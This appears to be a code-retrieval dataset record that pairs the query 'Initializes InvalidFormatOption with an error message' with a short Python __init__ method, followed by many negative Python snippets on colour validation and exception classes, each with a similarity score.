[ "0.6292298", "0.58811384", "0.58719945", "0.5639031", "0.5628314", "0.5543856", "0.54289997", "0.5320911", "0.53068715", "0.5306131", "0.5293901", "0.5212471", "0.52075624", "0.5191999", "0.5174318", "0.5155786", "0.51508164", "0.5130566", "0.5123885", "0.5118684", "0.5100034", "0.5097503", "0.5090377", "0.507855", "0.5064881", "0.5063999", "0.5059373", "0.50567025", "0.5051704", "0.50269526", "0.5023491", "0.5007765", "0.49983537", "0.49976748", "0.49928713", "0.4991232", "0.49891874", "0.49853298", "0.49761394", "0.49758476", "0.49744433", "0.49478176", "0.49378997", "0.49317697", "0.49217567", "0.4912418", "0.49117747", "0.4902056", "0.49012852", "0.4899893", "0.4896483", "0.4879558", "0.48707148", "0.4866485", "0.48497438", "0.48489156", "0.4845103", "0.48404682", "0.4832499", "0.4826534", "0.48177898", "0.48007286", "0.4784393", "0.47841492", "0.47811326", "0.477736", "0.4775644", "0.47741666", "0.4773817", "0.47717208", "0.47672758", "0.47634253", "0.476183", "0.47452328", "0.47414875", "0.4740219", "0.47398108", "0.47313017", "0.4726423", "0.47134456", "0.47096443", "0.47067395", "0.47032934", "0.4702815", "0.4699342", "0.4699342", "0.46977085", "0.4696576", "0.46889737", "0.46885058", "0.46506056", "0.4650418", "0.4650051", "0.4648397", "0.46441746", "0.4638734", "0.46375677", "0.46369842", "0.46334854", "0.46246058", "0.46245387" ]
0.0
-1
Initializes InvalidColorFormat with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_color__int_arg_invalid(self):\n with self.assertRaises(ValueError):\n color = pygame.Color(0x1FFFFFFFF)", "def throwColorError(type, r,g,b):\n\t\tif not (r >= 0): \n\t\t\tError.wrong_color_number(type, r)\n\t\telif not (g >= 0):\n\t\t\tError.wrong_color_number(type, g)\n\t\telse:\n\t\t\tError.wrong_color_number(type, b)", "def print_illegal_color_format_screen( enteredBGColor, enteredFGColor, convertedBGColor, convertedFGColor ):\n print \"\"\n print \"Error: are the passed in colors valid?\"\n print \" - passed in background-color '\" + enteredBGColor + \"' was converted to '\" + convertedBGColor + \"'.\"\n print \" - passed in foreground-color '\" + enteredFGColor + \"' was converted to '\" + convertedFGColor + \"'.\"\n print \"\"", "def test_color__rgba_int_args_invalid_value(self):\n self.assertRaises(ValueError, pygame.Color, 257, 10, 105, 44)\n self.assertRaises(ValueError, pygame.Color, 10, 257, 105, 44)\n self.assertRaises(ValueError, pygame.Color, 10, 105, 257, 44)\n self.assertRaises(ValueError, pygame.Color, 10, 105, 44, 257)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, r, g, b, struct=None):\n self._intern = struct or dlib.Color(r,g,b)", "def test_is_valid_color(self):\n self.assertTrue(is_valid_color('black'))\n self.assertTrue(is_valid_color('#aabb11'))\n self.assertTrue(is_valid_color('rgba(23,45,67, .5)'))\n self.assertFalse(is_valid_color('bl(ack'))", "def testConstructor(self):\n self.assertEquals(Color.RED, Color('RED'))\n self.assertEquals(Color.RED, Color(u'RED'))\n self.assertEquals(Color.RED, Color(20))\n if six.PY2:\n self.assertEquals(Color.RED, Color(long(20)))\n self.assertEquals(Color.RED, Color(Color.RED))\n self.assertRaises(TypeError, Color, 'Not exists')\n self.assertRaises(TypeError, Color, 'Red')\n self.assertRaises(TypeError, Color, 100)\n self.assertRaises(TypeError, Color, 10.0)", "def error(text):\n return color_str(text, 'RED')", "def test_color_field_states_invalid_input(self):\r\n # Field to color not in mapping file.\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5'], 'Fooz', ['a', 'b'], 'Bar')\r\n\r\n # Field to color by not in mapping file.\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5'], 'Foo', ['a', 'b'], 'Barz')\r\n\r\n # Field states are not found in field (due to subset of sample IDs).\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5'], 'Foo', ['a', 'c'], 'Bar')\r\n\r\n # Field states are not found in field (not in column at all).\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5', '6'], 'Foo', ['a', 'c', 'z'], 'Bar')\r\n\r\n # Not enough colors.\r\n samp_ids = [str(i) for i in range(1, 31)]\r\n self.assertRaises(ValueError, _color_field_states,\r\n self.too_many_colors_map_f, samp_ids, 'Description', samp_ids,\r\n 'Description')\r\n\r\n # No one-to-one mapping.\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5', '6'], 'Foo', ['a', 'c', 'b'], 'Baz')", "def test_colors_fail_uncalibrated(self):\n command = ('{0} -b 100 -e {1} {2} {2} {3}').format(\n os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_ev' + HEN_FILE_EXTENSION),\n 3, 5, 10)\n with pytest.raises(ValueError) as excinfo:\n hen.colors.main(command.split())\n\n assert \"No energy information is present \" in str(excinfo.value)", "def test_color__sequence_arg_invalid_format(self):\n cls = pygame.Color\n for seq_type in (tuple, list):\n self.assertRaises(ValueError, cls, seq_type((100,)))\n self.assertRaises(ValueError, cls, seq_type((100, 90)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 80, 70, 60)))", "def __init__(self, input_color, location, white_symbol, black_symbol):\n assert isinstance(input_color, Color)\n assert isinstance(location, Location)\n assert isinstance(white_symbol, str)\n assert isinstance(black_symbol, str)\n\n self.color = input_color\n self.location = location\n\n if self.color == color.white:\n self.symbol = white_symbol\n else:\n self.symbol = black_symbol", "def style_error(msg='{}'):\n red_code = '\\033[0;31m'\n return text_color(msg, red_code)", "def from_string(cls, text_color):\n\n a = 255\n try:\n r, g, b, a = text_color.replace('rgb(', '').replace(')', '').split(',')\n except ValueError:\n r, g, b = text_color.replace('rgb(', '').replace(')', '').split(',')\n\n return cls(int(r), int(g), int(b), int(a))", "def _initialize_fill_color_if_not_initialized(self) -> None:\r\n if hasattr(self, '_fill_color'):\r\n return\r\n self._fill_color = String('')", "def from_str (s):\n try: \n return from_csv(s)\n except Exception: \n pass\n \n try: \n return from_hex(s)\n except Exception: \n pass\n\n try:\n return from_name(s)\n except Exception: \n pass\n\n raise ColourFormatError(\"'%s' is not a recognized colour string\"%s)", "def __init__(self, r, g, b):\n if r < 0 or r > 255: raise ValueError(\"r value is out of range: %d\"%r)\n if g < 0 or g > 255: raise ValueError(\"g value is out of range: %d\"%g)\n if b < 0 or b > 255: raise ValueError(\"b value is out of range: %d\"%b)\n \n self.r, self.g, self.b = r, g, b", "def __init__(self, *rgb):\n self.alpha = 255\n if len(rgb) == 1:\n\t #Accept a string in the hext fromat made by color_rgb func.\n\t if isinstance(rgb[0],str):\n self.rgb = rgb_color(rgb[0])\n\t else:\n self.rgb=rgb[0]\n elif len(rgb) == 3:\n self.rgb = rgb\n elif len(rgb) == 4:\n self.rgb = rgb[:-1]\n self.alpha = rgb[-1]\n else:\n raise AttributeError, \"invalid arguments to Color(); needs at least 3 integers: red, green, blue (transparency optional)\"\n self.rgb = map(lambda v: int(max(min(v,255),0)), self.rgb)", "def test_color__rgba_int_args_invalid_value_without_alpha(self):\n self.assertRaises(ValueError, pygame.Color, 256, 10, 105)\n self.assertRaises(ValueError, pygame.Color, 10, 256, 105)\n self.assertRaises(ValueError, pygame.Color, 10, 105, 256)", "def format_error(type, message):\n return colored(type + ': ', 'red', attrs=['bold']) + message", "def from_color(cls, color):\n\n color = ('rgb(%d, %d, %d, %d)' % color.getRgb())\n return cls.from_string(color)", "def parse_color(self):\n begin = self.tokenizer.next()\n begin.must_be('{')\n for name in self.tokenizer:\n if name.text == '}': return\n name.must_match(\"^[A-Za-z]\", \"%d:%d: Expected a color name, got %s instead.\" % (name.line, name.col, name.text))\n midpunct = self.tokenizer.next()\n if midpunct.text == \"{\":\n color = self.mkColor(name)\n if color in self.ColorDefinitions:\n raise Exception(\"%d:%d: Color %s has already been defined.\" % (name.line, name.col, name.text))\n self.ColorDefinitions[name.text] = color\n elif midpunct.text == ':':\n stack = []\n for token in self.tokenizer:\n if token.text == \".\":\n self.OrderedColorMappings += [Mapping(name,stack)]\n break\n elif token.text == \"}\": raise Exception(\"%d:%d: Color section ended while defining mapping for color %s\" % (name.line, name.col, name.text))\n try:\n stack += [ self.GlobalSymbolDict[token.text] ]\n except:\n raise Exception(\"%d:%d: Literal %s does not occur in the grammar\" % (token.line, token.col, token.text))\n \n elif midpunct.text == '}': raise Exception(\"%d:%d: Coloring section ended unexpectedly here.\" % (token.line, token.col))\n else: raise Exception(\"%d:%d: Expected : or {, not %s\" % (midpunct.line, midpunct.col, midpunct.text))\n raise Exception(\"%d:%d: Unexpected end-of-file while scanning color definition section beginning here.\" % (begin.line, begin.col))", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def test_is_valid_color_name(self):\n self.assertTrue(is_valid_color_name('black'))\n self.assertTrue(is_valid_color_name('red'))\n self.assertFalse(is_valid_color_name('#aabb11'))\n self.assertFalse(is_valid_color_name('bl(ack'))", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ColorRangeHSV, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.h_min is None:\n self.h_min = 0\n if self.h_max is None:\n self.h_max = 0\n if self.s_min is None:\n self.s_min = 0.\n if self.s_max is None:\n self.s_max = 0.\n if self.v_min is None:\n self.v_min = 0.\n if self.v_max is None:\n self.v_max = 0.\n else:\n self.h_min = 0\n self.h_max = 0\n self.s_min = 0.\n self.s_max = 0.\n self.v_min = 0.\n self.v_max = 0.", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, registration_number, color):\n self._reg_number = registration_number\n self._color = color", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def color_invalid(self):\n for i in self.invalid:\n self.color_cell(i, INVALID)", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\n self.colour = target_colour", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\n self.colour = target_colour", "def test_color__sequence_arg_invalid_value(self):\n cls = pygame.Color\n for seq_type in (tuple, list):\n self.assertRaises(ValueError, cls, seq_type((256, 90, 80, 70)))\n self.assertRaises(ValueError, cls, seq_type((100, 256, 80, 70)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 256, 70)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 80, 256)))", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, *args, **kwargs):\n self._supports_color = supports_color()\n super(ColorLoggerMixin, self).__init__(*args, **kwargs)", "def test_is_valid_rgb_color(self):\n self.assertTrue(is_valid_rgb_color('rgb(12,23,5)'))\n self.assertTrue(is_valid_rgb_color('rgb(12, 223, 225)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, 1)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, 1.0)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, 0)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, .3)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, .34521)'))\n\n # invalid cases\n self.assertFalse(is_valid_rgb_color('rgb(12, 223, 225, 0.5)'))\n self.assertFalse(is_valid_rgb_color('rgb(12, 223, 225, 5)'))\n self.assertFalse(is_valid_rgb_color('rgb(1234, 223, 225)'))\n self.assertFalse(is_valid_rgb_color('rgba(1234, 223, 225,.5)'))\n self.assertFalse(is_valid_rgb_color('rgba(1234, 223, 225,1.1)'))", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def test_color__sequence_arg_invalid_value_without_alpha(self):\n cls = pygame.Color\n for seq_type in (tuple, list):\n self.assertRaises(ValueError, cls, seq_type((256, 90, 80)))\n self.assertRaises(ValueError, cls, seq_type((100, 256, 80)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 256)))", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\r\n self.colour = target_colour", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\r\n self.colour = target_colour", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\r\n self.colour = target_colour", "def after_init(self) -> None:\n if self.options.format.lower() != \"default_notebook\":\n self.error_format = self.options.format\n if not hasattr(self, \"color\"):\n self.color = True", "def _init_colors(self):\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'", "def __init__(self, init_val):\n self.err_fig_num = init_val\n self.disp_fig_num = init_val", "def after_init(self):\n if self.options.format.appended:\n self.error_format = self.options.format.appended[0]", "def test_car_object_color_when_color_type_is_invalid_raises_exception():\n # Arrange\n color = 1\n max_speed = 30\n acceleration = 10\n tyre_friction = 3\n\n # Act\n with pytest.raises(Exception) as e:\n assert Car(color=color, max_speed=max_speed,\n acceleration=acceleration, tyre_friction=tyre_friction)\n\n # Assert\n assert str(e.value) == \"Invalid value for color\"", "def __init__(self, colors=('red', 'blue'), **kwargs):\n self._colors = list(map(mcolors.to_rgba, colors))\n super().__init__(color=self._colors[0], **kwargs)", "def __init__(self, colors=('red', 'blue'), **kwargs):\n self._colors = list(map(mcolors.to_rgba, colors))\n super().__init__(color=self._colors[0], **kwargs)", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def test_init_with_format_str_and_header_True_raises_error(self):\n with pytest.raises(ValueError):\n _ = CSVFormatter(fmt_str=\"\", header=True)", "def test_init_no_args(self):\n\n fill = FillColor()\n self.assertEqual((0, 0, 0), fill.color)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, colorNames):\n self._lengthOfPattern = 0 # will later be queried from the user\n self._palette = '' # initials for color choices, e.g., R for red\n for color in colorNames:\n self._palette += color[0].upper()", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, data, validate=False):\n self._validate = validate\n super(StyleFormats, self).__init__(data or {})", "def __init__(self, *args, **kwargs):\n _gdi_.Colour_swiginit(self,_gdi_.new_Colour(*args, **kwargs))", "def __init__(self, red=Black.red, green=Black.green, blue=Black.blue):\n self.color = Color(red, green, blue)\n\n self.template = '\\ttextcolor = {textcolor};\\n'", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, port):\n super(InvalidPort, self).__init__(\n 'The port (\"{0}\") is not valid.'.format(port))", "def __init__(self, month, day, name, color_code):\n self.color_code = color_code\n self.day = day\n self.month = month\n self.name = name", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def print_err(*vargs, **kwargs):\n _do_print_color(*vargs, colorcode = 31, **kwargs)", "def test_init__invalid_error_handler_fails(self):\n\n class InvalidErrorHandler:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"error_handler\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(error_handler=InvalidErrorHandler())", "def error(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def check_color_scoping(self):\n for mapping in self.OrderedColorMappings:\n if mapping.token.text not in self.ColorDefinitions:\n raise Exception(\"%d:%d Color %s is never defined\" % (mapping.token.line, mapping.token.col, mapping.token.text))", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, message, fatal, error_num=None):\n Exception.__init__(self, message)\n self.fatal = fatal\n self.errno = error_num", "def is_invalid():\n print(colored('Invalid input\\n', 'red', attrs=['bold']))", "def error_message(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def _validate_color(color):\n if not isinstance(color, (list, tuple)):\n raise ValueError(\"Color has to be list, or tuple\")\n if len(color) != 3:\n raise ValueError(\"Color have to contain exactly 3 values: [R, G, B]\")\n for channel in color:\n validate_channel_value(channel)", "def __init__(self, color: str, smell: str):\n self.color = color\n self.smell = smell", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def initFormat(self):\n pass", "def format_color(\n color: Union[ColorInputType, Any],\n warn_if_invalid: bool = True\n) -> Union[ColorType, Any]:\n if not isinstance(color, ColorInputInstance):\n return color\n if not isinstance(color, pygame.Color):\n try:\n if isinstance(color, VectorInstance) and 3 <= len(color) <= 4:\n if PYGAME_V2:\n for j in color:\n if not isinstance(j, int):\n raise ValueError('color cannot contain floating point values')\n c = pygame.Color(*color)\n else:\n c = pygame.Color(color)\n except ValueError:\n if warn_if_invalid:\n warn(f'invalid color value \"{color}\"')\n else:\n raise\n return color\n else:\n c = color\n return c.r, c.g, c.b, c.a", "def __init__(self, g, msg):\n self.graph = g\n self.message = 'Graph ' + repr(self.graph) + ' error: ' + msg", "def clean_colors(self):\n err = _(\"Color must be a valid hex triplet.\")\n colors = ['background_color_custom', 'font_color_custom']\n colors2 = colors + ['background_color', 'font_color']\n # If there are custom colors specified in settings, length of\n # self.COLORS will be > 6, so check for validity\n if len(self.COLORS) > 6:\n colors = colors2\n for color in colors:\n c = getattr(self, color)\n l = len(c)\n if l:\n if l != 6:\n raise ValidationError(err)\n else:\n try:\n int(c, 16)\n except ValueError:\n raise ValidationError(err)", "def invalid_colour(colour):\n error_message = f\"`{colour}` is not a valid RGB colour\"\n\n if not isinstance(colour, list):\n return error_message\n\n if not all([0 <= component <= 255 for component in colour]):\n return error_message\n\n return False", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: C2Line(self.bad_line))", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def __init__(self, red, green, blue, alpha = 255):\n self._red = red\n self._green = green\n self._blue = blue \n self._alpha = alpha", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def test_init__invalid_logger_fails(self):\n\n class InvalidLogger:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"logger\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(logger=InvalidLogger())", "def __init__(self, message, code=None):\n WebSocketError.__init__(self, message)\n self.code = code", "def on_init_fail(self, event_time, message):\n pass" ]
[ "0.6307895", "0.5999552", "0.5958542", "0.56025517", "0.55953807", "0.5590387", "0.5570816", "0.55706704", "0.5564297", "0.55582446", "0.55362266", "0.55183357", "0.5498367", "0.5497162", "0.54941034", "0.5482115", "0.5468498", "0.5452355", "0.5448693", "0.54256946", "0.5418703", "0.54101783", "0.54027694", "0.5402317", "0.53902507", "0.538478", "0.53728807", "0.53705204", "0.53621274", "0.5359727", "0.5347986", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5336727", "0.5334468", "0.5331238", "0.5319294", "0.5319294", "0.53119016", "0.5297035", "0.52946085", "0.5287633", "0.52754486", "0.527235", "0.52665", "0.52665", "0.52665", "0.5235684", "0.52202296", "0.52148396", "0.5204299", "0.5200045", "0.5191352", "0.5191352", "0.51893973", "0.5187414", "0.518395", "0.5176848", "0.51673245", "0.5162832", "0.5161432", "0.51483285", "0.5147621", "0.5146641", "0.5135498", "0.5135047", "0.5127958", "0.5119854", "0.51145357", "0.51069397", "0.51051193", "0.5104853", "0.50991875", "0.5086483", "0.50843686", "0.50840026", "0.50797045", "0.50736845", "0.5071013", "0.5067281", "0.50591683", "0.50556713", "0.5054711", "0.5045396", "0.5030684", "0.50281197", "0.5019731", "0.50173056", "0.5012203", "0.5010799", "0.500244", "0.50001514", "0.4999452", "0.49982768", "0.49930125", "0.49888757" ]
0.0
-1
Initializes InvalidFormatOption with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _invalid_option_error(self, option_name):\n msg = \"'{}' is not a valid option for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def after_init(self):\n if self.options.format.appended:\n self.error_format = self.options.format.appended[0]", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def test_init_with_format_str_and_header_True_raises_error(self):\n with pytest.raises(ValueError):\n _ = CSVFormatter(fmt_str=\"\", header=True)", "def error(self, message):\n raise ArgumentParseError(message)", "def command_error(fmt, *args, **kwargs):\n raise CommandError(fmt.format(*args, **kwargs))", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, message):\n logging.error(\"ERROR: {0}\".format(message))\n logging.error(\"Try running with --help for more information.\")", "def _incomplete_error(self, option_name):\n msg = \"'{}' must be specified for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def set_format(self, fmt):\n\n if \"{message}\" not in fmt:\n raise ValueError(\"Defining a log format (%s) that doesn't contain '{message}'\" % fmt)\n\n self._fmt = fmt", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def initFormat(self):\n pass", "def test_invalidValues(self):\n argV = \"--fooint egg\".split()\n self.assertRaises(usage.UsageError, self.usage.parseOptions, argV)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def set_error(self, error):\n self._set_sub_text('error', text=str(error))\n return self", "def error(self, message=None, show_help=True):", "def __init__(self, format_string):\r\n if not isinstance(format_string, Compatibility.string):\r\n raise TypeError('format_string should be a string, instead got %s' % type(format_string))\r\n self._re_pattern, self._applicators = self._preprocess_format_string(format_string)\r\n self._re = re.compile(self._re_pattern)", "def __init__(self, data, validate=False):\n self._validate = validate\n super(StyleFormats, self).__init__(data or {})", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def 